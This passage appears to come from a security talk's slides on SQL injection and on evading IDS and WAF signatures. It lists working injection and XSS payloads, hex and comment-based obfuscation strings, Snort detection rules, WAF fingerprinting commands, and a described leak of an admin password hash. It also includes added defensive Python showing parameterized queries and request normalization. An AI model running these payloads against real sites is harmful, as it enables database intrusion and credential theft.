may be filtered with javascript/vbscript and remove them 

- Save the page locally and remove offending javascript/vbscript 

or 

- Use a local proxy (ex: Paros, Webscarab, Burp Suite) 
Restrictive Blacklist

Server-side Alphanumeric Filter 

http://[site]/page.asp?id=2 or 1 like 1 

Here we are doing an "or true," although this time we are using the "like" 
comparison instead of the "=" sign. We can use this same technique for the other 
variants such as "and 1 like 1" or "and 1 like 2" 

http://[site]/page.asp?id=2 and 1 like 1 
http://[site]/page.asp?id=2 and 1 like 2 
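As an added illustration (not code from the slides), the alphanumeric filter from this slide beside a parameterized lookup, run against a constructed SQLite table: the filter passes "2 or 1 like 1" untouched, the concatenated query then returns every row, while the bound-parameter version compares the whole string as one literal. The table, its columns and the assumption that the filter allows spaces are mine.

```python
import re
import sqlite3

# Constructed stand-in for the page's back-end table (not from the slides).
ROWS = [(1, "alpha"), (2, "bravo"), (3, "charlie")]


def _db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE page (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO page VALUES (?, ?)", ROWS)
    return conn


# The slide's server-side filter: letters, digits and spaces only (assumed), all else rejected.
ALNUM = re.compile(r"^[A-Za-z0-9 ]+$")


def passes_alnum_filter(value):
    return bool(ALNUM.match(value))


def vulnerable_lookup(value):
    """Filter, then concatenate: 'or 1 like 1' needs no quote, no '=' and no comment,
    so it survives the filter and still turns the WHERE clause into 'or true'."""
    if not passes_alnum_filter(value):
        return []
    return _db().execute(f"SELECT id, title FROM page WHERE id = {value}").fetchall()


def parameterized_lookup(value):
    """Bind the value instead of building SQL from it: the whole string is one
    literal compared against id, so 'or 1 like 1' never becomes SQL."""
    return _db().execute("SELECT id, title FROM page WHERE id = ?", (value,)).fetchall()


def typed_lookup(value):
    """Tighter still: an id must be an integer, so reject the input before any SQL exists."""
    if not re.fullmatch(r"[0-9]+", value):
        raise ValueError(f"id must be an integer, got {value!r}")
    return parameterized_lookup(value)


if __name__ == "__main__":
    for probe in ("2", "2 or 1 like 1", "2 and 1 like 2"):
        print(f"{probe!r}: filter={passes_alnum_filter(probe)} "
              f"concatenated={vulnerable_lookup(probe)} bound={parameterized_lookup(probe)}")
```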
Signature Based IDS

The key to IDS/IPS evasion is knowing that there is one in place. 

With an IPS you can use something like Active Filter Detection or you can try something 
REALLY noisy from another IP address to see if your IP gets blocked. 

Depending on the scope of your engagement you may or may not really be able to identify when an IDS is in use, because it's passive in nature.

I've honestly found this side of the house to be more proof-of-concept, and just having 
fun as opposed to something I've actually needed on assessments. 
Signature Based IDS (1)

Signature 1

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: "SQL Injection attempt"; flow: to_server, established; content: "' or 1=1 --"; nocase; sid: 1; rev:1;)

Bypass Techniques:
http://[site]/page.asp?id=2 or 2=2--
http://[site]/page.asp?id=2 or 1<2--
http://[site]/page.asp?id=2 or 1 like 1--
http://[site]/page.asp?id=2 /**/or /**/2/**/=/**/2--
....c'mon everyone name some more 

Signature Negatives 

- Having the ' in the signature will cause you to miss attacks that don't utilize the ' 
- 1=1 is not the only way to create a query that returns "true" (ex: 2=2, 1<2, etc) 
If this signature is so easily bypassed, what is it actually good for? 

Answer: 

It's great for automated tools and kiddies 
Signature Based IDS (My Opinion)

Signature Based IDS (2)

Signature 2

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: "SQL Injection attempt"; flow: to_server, established; pcre: "/(and|or) 1=1 (\-\-|\/\*|\#)/i"; sid: 1; rev:2;)

Bypass Techniques: 

http://[site]/page.asp?id=2 or 2=2%2D%2D 
http://[site]/page.asp?id=2 or 1<2%2D%2D 
http://[site]/page.asp?id=2 or 1 like 1%2D%2D 
http://[site]/page.asp?id=2 /**/or /**/2/**/=/**/2%2D%2D 
....c'mon everyone name some more 

Signature Negatives 

- 1=1 is not the only way to create a query that returns "true" (ex: 2=2, 1<2, etc)

- Comments, like pretty much anything else, can be represented in other encodings (ex: %2D%2D = --)

- It is possible to attack an sql injection vulnerability without using comments
If this signature is so easily bypassed, what is it actually good for? 

Answer: 

Again, it's great for automated tools and kiddies 
Signature Based IDS (3-5)

Signature 3-5

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: "SQL Injection SELECT statement"; flow: to_server, established; pcre:"/select.*from.*(\-\-|\/\*|\#)/i"; sid: 2; rev: 1;)

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: "SQL Injection UNION statement"; flow: to_server, established; pcre:"/union.*(\-\-|\/\*|\#)/i"; sid: 3; rev: 1;)

Bypass Techniques: 

http://[site]/page.asp?id=2 or 2 in (%73%65%6C%65%63%74%20%75%73%65%72)%2D%2D
http://[site]/page.asp?id=2 or 2 in (select user)--

http://[site]/page.asp?id=-2%55%4E%49%4F%4E%20%41%4C%4C%20%73%65%6C%65%63%74%201,2,3,(%73%65%6C%65%63%74%20%75%73%65%72),5,6,7%2D%2D

http://[site]/page.asp?id=-2 UNION ALL select 1,2,3,(select user),5,6,7--
....c'mon everyone name some more

Signature Negatives

- Although sigs 3-5 are much better, they don't consider that the attacker may use different encoding types such as hex
Signature Based IDS (6-7)

Signature 6

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: "SQL Injection SELECT statement"; flow: to_server, established; pcre:"/(s|%73)(e|%65)(l|%6C)(e|%65)(c|%63)(t|%74).*(f|%66)(r|%72)(o|%6F)(m|%6D).*(\-\-|\/\*|\#)/i"; sid: 2; rev: 2;)

Signature 7

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: "SQL Injection SELECT statement"; flow: to_server, established; pcre:"/(s|%73|%53)(e|%65|%45)(l|%6C|%4C)(e|%65|%45)(c|%63|%43)(t|%74|%45).*(f|%66|%46)(r|%72|%52)(o|%6F|%4F)(m|%6D|%4D).*(\-\-|\/\*|\#)/i"; sid: 2; rev: 3;)

At least signature 7 takes into account case sensitivity with hex encoding. 

But 

There are always other encoding types that the attacker can use... 
Practice Your Kung Fu: PHPIDS

(PHPIDS smoketest screenshots; only the legible text is kept.)

A first smoketest run (its input is not legible in the scan) fired the rules "Detects common XSS concatenation patterns 2/2" (impact: 4), "Detects common comment types" (impact: 3), "Detects classic SQL injection probings 1/2" (impact: 6), "Detects classic SQL injection probings 2/2" (impact: 6) and "Detects unknown attack vectors based on PHPIDS Centrifuge detection" (impact: 7); PHPIDS Centrifuge data: ratio 3.3, threshold 3.49; Overall impact: 26.

Smoketest input: ' or 1 in (select user))--

found injection: ' or 1 in (select user))

rule-description: Detects common comment types
impact: 3

rule-description: Detects classic SQL injection probings 1/2
impact: 6

rule-description: Detects classic SQL injection probings 2/2
impact: 6

rule-description: Detects unknown attack vectors based on PHPIDS Centrifuge detection
impact: 7

PHPIDS Centrifuge data: ratio 2.875, threshold 3.49

Overall impact: 22

Practice Your Kung Fu: PHPIDS

Smoketest input: %27%20or 1 in (select user))%2D%2D

Nothing suspicious was found!
Signature Based IDS

The real trick for each of these techniques is to understand that this is just like IDS 
evasion in the service based exploitation side of the house. 

You have to make sure that your attack actually works. It's easy to bypass an IDS, but 
you can just as easily end up with your attack bypassing the IDS, but not working at all. 

With this in mind you can mix/match the IDS evasion tricks - it's just a matter of 
understanding the regex in use. 

http://[site]/page.asp?id=2%20or%202%20in%20(/*IDS*/%73/*evasion*/%65/*is*/%6C/*easy*/%65/*just*/%63/*ask*/%74/*j0e*/%20%75/*to*/%73/*teach*/%65/*you*/%72/*how*/)%2D%2D

What is passed to the db:
http://[site]/page.asp?id=2 or 2 in (select user)--

The comments spell out "IDS evasion is easy just ask j0e to teach you how".
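As an added detection-side illustration (not code from the slides, Snort or PHPIDS), the match bodies of signatures 1, 2, 3-5 and 7 run against the bypass strings from the preceding slides, beside a detector that first rewrites the request into what reaches the database (URL-decoding and dropping inline comments) and only then matches. The sample query strings are the slides' own; the `normalize` step, the three normalized patterns and the use of %54 for uppercase T in signature 7 are my assumptions.

```python
import re
from urllib.parse import unquote

# The slides' Snort rules reduced to their match bodies (sig 1 is a plain content match;
# sig 7 is written with %54 for uppercase T, which is what the rule needs for 't').
RAW_SIGS = {
    "sig1": re.compile(re.escape("' or 1=1 --"), re.I),
    "sig2": re.compile(r"(and|or) 1=1 (\-\-|\/\*|\#)", re.I),
    "sig3": re.compile(r"select.*from.*(\-\-|\/\*|\#)", re.I),
    "sig4": re.compile(r"union.*(\-\-|\/\*|\#)", re.I),
    "sig7": re.compile(
        r"(s|%73|%53)(e|%65|%45)(l|%6C|%4C)(e|%65|%45)(c|%63|%43)(t|%74|%54)"
        r".*(f|%66|%46)(r|%72|%52)(o|%6F|%4F)(m|%6D|%4D).*(\-\-|\/\*|\#)", re.I),
}

# Assumed patterns, applied only after the request is rewritten into what the database sees.
NORMALIZED_SIGS = {
    "tautology": re.compile(r"\b(or|and)\s+\S+\s*(=|<|>|like|in)\s*\S+"),
    "union_select": re.compile(r"union\s+(all\s+)?select\b"),
    "subselect": re.compile(r"\bselect\b"),
}


def normalize(query_string):
    """Undo the two tricks the slides use: URL/hex encoding (decoded twice to cover
    double encoding) and inline /* */ comments, which the slide shows the back end
    collapsing to nothing. Whitespace is squeezed and case folded afterwards."""
    s = query_string
    for _ in range(2):
        s = unquote(s)
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.S)
    return re.sub(r"\s+", " ", s).strip().lower()


def raw_hits(query_string):
    """Which of the slides' signatures fire on the request exactly as sent."""
    return [name for name, rx in RAW_SIGS.items() if rx.search(query_string)]


def normalized_hits(query_string):
    """Which patterns fire once the request is reduced to what reaches the database."""
    text = normalize(query_string)
    return [name for name, rx in NORMALIZED_SIGS.items() if rx.search(text)]


# Query strings taken from the slides' bypass lists (constructed sample traffic).
SAMPLES = {
    "plain": "id=2' or 1=1 --",
    "two_equals_two": "id=2 or 2=2--",
    "comment_split": "id=2 /**/or /**/2/**/=/**/2%2D%2D",
    "hex_select": "id=2 or 2 in (%73%65%6C%65%63%74%20%75%73%65%72)%2D%2D",
    "hex_union": "id=-2%55%4E%49%4F%4E%20%41%4C%4C%20%73%65%6C%65%63%74%201,2,3,"
                 "(%73%65%6C%65%63%74%20%75%73%65%72),5,6,7%2D%2D",
    "comment_padded": "id=2%20or%202%20in%20(/*IDS*/%73/*evasion*/%65/*is*/%6C/*easy*/"
                      "%65/*just*/%63/*ask*/%74/*j0e*/%20%75/*to*/%73/*teach*/%65/*you*/"
                      "%72/*how*/)%2D%2D",
    "benign": "id=5",
}

if __name__ == "__main__":
    for label, qs in SAMPLES.items():
        print(f"{label:15} raw={raw_hits(qs)} normalized={normalized_hits(qs)}")
        print(f"{'':15} db sees: {normalize(qs)}")
```

Only the plain "' or 1=1 --" probe trips any of the raw signatures; every other sample reaches the database as a tautology, a subselect or a UNION and is caught only after normalization.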
Identifying Web Application Firewalls

WAFs are surprisingly easy to detect.

Generally you just have to send 1 valid request, and one malicious request and diff the response.

Malicious tends to be any HTTP request that has a payload that contains characters like:

' " * ( ) # | ^ < ?
Identifying Web Application Firewalls

How can you determine if the target host has deployed a WAF?

Curl

curl -i http://targetcompany.com/cmd.exe | grep "501 Method"

Netcat

$ (echo "GET /cmd.exe HTTP/1.1"; echo "Host: targetcompany.com"; echo) | nc targetcompany.com 80 | grep "501 Method Not Implemented"

If the server responds with error code "501 Method Not Implemented" then it is running mod_security.

Curl

curl -i http://www.targetcompany.com/%27

HTTP/1.1 999 No Hacking
Server: WWW Server/1.1

WebKnight Application Firewall Alert

Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site.

What is WebKnight?

AQTRONIX WebKnight is an application firewall for web servers and is released under the GNU General Public License. It is an ISAPI filter for securing web servers by blocking certain requests. If an alert is triggered WebKnight will take over and protect the web server.

For more information on WebKnight: http://www.aqtronix.com/WebKnight/

AQTRONIX WebKnight
Identifying Web Application Firewalls

How can you determine if the target host has deployed a WAF?

Gary O'Leary-Steele
http://packetstormsecurity.org/web/unicode-fun.txt

[j0e@LinuxLaptop toolz]$ ruby unicode-fun.rb

Enter string to URL Unicode:<script>alert('XSS')</script>

%u003c%uff53%uff43%uff52%uff49%uff50%uff54%u003e%uff41%uff4c%uff45%uff52%uff54%uff08%u02b9%uff38%uff33%uff33%u02b9%uff09%u003c%u2215%uff53%uff43%uff52%uff49%uff50%uff54%u003e

Curl

curl -i http://www.targetcompany.com/%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%58%53%53%27%29%3c%2f%73%63%72%69%70%74%3e

HTTP/1.1 404 Not Found
Date: Sat, 14 Mar 2009 19:13:10 GMT
Server: Apache
Identifying Web Application Firewalls

How can you determine if the target host has deployed a WAF?

Curl

curl -i http://www.targetcompany.com/%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%58%53%53%27%29%3c%2f%73%63%72%69%70%74%3e

HTTP/1.1 200 Condition Intercepted
Date: Sun, 15 Mar 2009 01:42:01 GMT
Server: Apache
DotNet Defender WAF

(Browser screenshot; only the legible text is kept.)

Request: main.asp?goto=<script>alert(...)</script>&pid=3

15-Mar-09

dotDefender Blocked Your Request

Please contact the site administrator, and provide the following Reference ID:

7391-5D9B-AD44-078B

dotDefender Web Application Firewall

dotDefender is a software-based web application firewall installed on Apache, IIS, or Microsoft ISA Server.

Download a fully-featured 30 days trial version from: http://www.applicure.com/?page=dotDefender
Bypassing DotNet Defender

(Browser screenshot; only the legible text is kept.)

Request: main.asp?goto=...asp?id=1 or 1 in (select user)--&pid=

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'dbo' to data type int.

/CUSScripts.asp, line 1659
DotNet Defender

(Browser screenshot; only the legible text is kept.)

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3077.00 (Intel X86) Dec 17 2008 15:19:45 Copyright (c) 1988-2005 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.

/CUSScripts.asp, line 1732
Dumping Admin PW - sorry DotNet Defender

(Browser screenshot; only the legible text is kept.)

Request: ...1 or 1 in (select master.dbo.fn_varbintohexstr(... (cut off in the screenshot)

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value '0x0100...' (the password hash; illegible in the scan) to data type int.

/CUSScripts.asp, line 1732
Basic References

SQL Tutorials:

http://www.sql-tutorial.net/

SQL Injection Tutorials:

http://www.securitydocs.com/library/3587

http://www.astalavista.com/index.php?section=docsys&cmd=details&id=42

SQL Injection Cheatsheets:

http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/
References For This Presentation

Lots, and lots, and lots of late nights with rum and coke at my side...

Paul Battista's ToorCon 9 Presentation

http://www.securityexperiment.com/se/documents/Overlooked%20SQL%20Injection%2020071021.pdf

Brad Warneck's GCIA Paper

http://www.giac.org/certified_professionals/practicals/gcia/1231.php
Holla @ Me....

You want the presentation????? Buy me a rum and coke or email me.

You can contact me at:

Email: joe@learnsecurityonline.com

Twitter: http://twitter.com/j0emccray

LinkedIn: http://www.linkedin.com/in/joemccray